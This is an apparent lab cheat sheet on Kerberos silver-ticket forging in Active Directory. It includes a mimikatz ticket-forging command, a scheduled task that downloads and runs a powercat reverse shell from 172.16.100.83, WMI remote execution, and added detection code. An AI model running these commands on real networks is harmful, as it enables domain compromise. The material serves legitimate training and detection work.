Silver Ticket
A silver ticket is signed and encrypted with the hash of the service account, which makes it a valid TGS (service) ticket for that service without ever contacting the KDC.
Create The Ticket
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
kerberos::golden
Name of the module
/User:Administrator
Username for which the TGT is generated
/domain:
Domain FQDN
/sid:
SID of the domain
/target:
Target server FQDN
/service:
The SPN of the service for which the TGS is to be created
/aes256:
AES256 keys of the krbtgt account
/id:500 /groups:512
Optional User and Group RID
/ptt
Pass-the-ticket: inject the ticket into the current process
/startoffset:0
Optional: offset, in minutes, from now at which the ticket becomes valid. Use a negative value for a ticket valid from the past and a positive value for one valid in the future.
/endin:600
Optional ticket lifetime in minutes (default 10 years). The default AD setting is 10 hours = 600 minutes
/renewmax:10080
Optional ticket lifetime with renewal in minutes (default 10 years). The default AD setting is 7 days = 10080 minutes
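Two defender-side checks that follow from the parameters above, as an added example that is not part of the original page: a forged ticket never produces a 4769 TGS request on the DC, so a Kerberos 4624 logon on the target with no matching 4769 is the gap it leaves, and a ticket whose validity exceeds the 600 / 10080 minute defaults betrays mimikatz' 10-year default lifetime. All event records and times are constructed sample data; field names follow the Windows Security log schema for 4769 and 4624.

```python
from datetime import datetime, timedelta

# Domain defaults quoted on this page: 10 h ticket life, 7 d renewal (in minutes).
MAX_LIFE = timedelta(minutes=600)
MAX_RENEW = timedelta(minutes=10080)

def lifetime_anomalies(tickets):
    """Return services of cached tickets (klist-style records, constructed here)
    whose validity exceeds domain policy, e.g. mimikatz' default 10-year lifetime."""
    flagged = []
    for t in tickets:
        start, end, renew = (datetime.fromisoformat(t[k]) for k in ("start", "end", "renew_till"))
        if end - start > MAX_LIFE or renew - start > MAX_RENEW:
            flagged.append(t["service"])
    return flagged

def _user(name):
    # 4769 carries "alice@DOLLARCORP.MONEYCORP.LOCAL", 4624 carries "alice": compare equal
    return name.split("@")[0].lower()

def unrequested_kerberos_logons(dc_4769, host_4624, window=MAX_LIFE):
    """Return host 4624 Kerberos logons with no 4769 TGS request on the DC for the
    same user within `window` before the logon (the KDC never saw a forged ticket)."""
    requests = [(datetime.fromisoformat(e["time"]), _user(e["TargetUserName"])) for e in dc_4769]
    suspicious = []
    for e in host_4624:
        if e["AuthenticationPackageName"] != "Kerberos":
            continue
        when, who = datetime.fromisoformat(e["time"]), _user(e["TargetUserName"])
        if not any(who == u and when - window <= ts <= when for ts, u in requests):
            suspicious.append((e["TargetUserName"], e["IpAddress"]))
    return suspicious

# Constructed sample data, not real logs.
TICKETS = [
    {"service": "cifs/dcorp-dc.dollarcorp.moneycorp.local", "start": "2024-05-01T09:00:00",
     "end": "2024-05-01T19:00:00", "renew_till": "2024-05-08T09:00:00"},   # endin 600 / renewmax 10080
    {"service": "host/dcorp-dc.dollarcorp.moneycorp.local", "start": "2024-05-01T09:00:00",
     "end": "2034-04-29T09:00:00", "renew_till": "2034-04-29T09:00:00"},   # tool default: 10 years
]
DC_4769 = [{"time": "2024-05-01T09:00:00", "TargetUserName": "alice@DOLLARCORP.MONEYCORP.LOCAL",
            "ServiceName": "DCORP-DC$", "TicketEncryptionType": "0x12"}]
HOST_4624 = [
    {"time": "2024-05-01T09:00:05", "TargetUserName": "alice", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.20"},
    {"time": "2024-05-01T09:30:00", "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.83"},
]

if __name__ == "__main__":
    print(lifetime_anomalies(TICKETS))                  # only the 10-year ticket
    print(unrequested_kerberos_logons(DC_4769, HOST_4624))  # only the Administrator logon
```

Note that the ticket on this page sets /endin:600 and /renewmax:10080 precisely so it matches policy and passes the lifetime check, which is why the 4769/4624 correlation is the check that matters.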
Abusing Services
HOST
A silver ticket for the HOST service allows creating scheduled tasks on remote computers. The silver ticket needs to be created with the NT hash of the target machine account.
# Check you have permissions
schtasks /S dcorp-dc.dollarcorp.moneycorp.local
# Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Job" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1'')'"
# Run the created schtask now
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Job"
HOST + RPCSS
With these two tickets (HOST and RPCSS) you can execute WMI on the victim system:
# Check you have permissions
Invoke-WmiMethod -class win32_operatingsystem -ComputerName dcorp-dc
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
# Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$Program"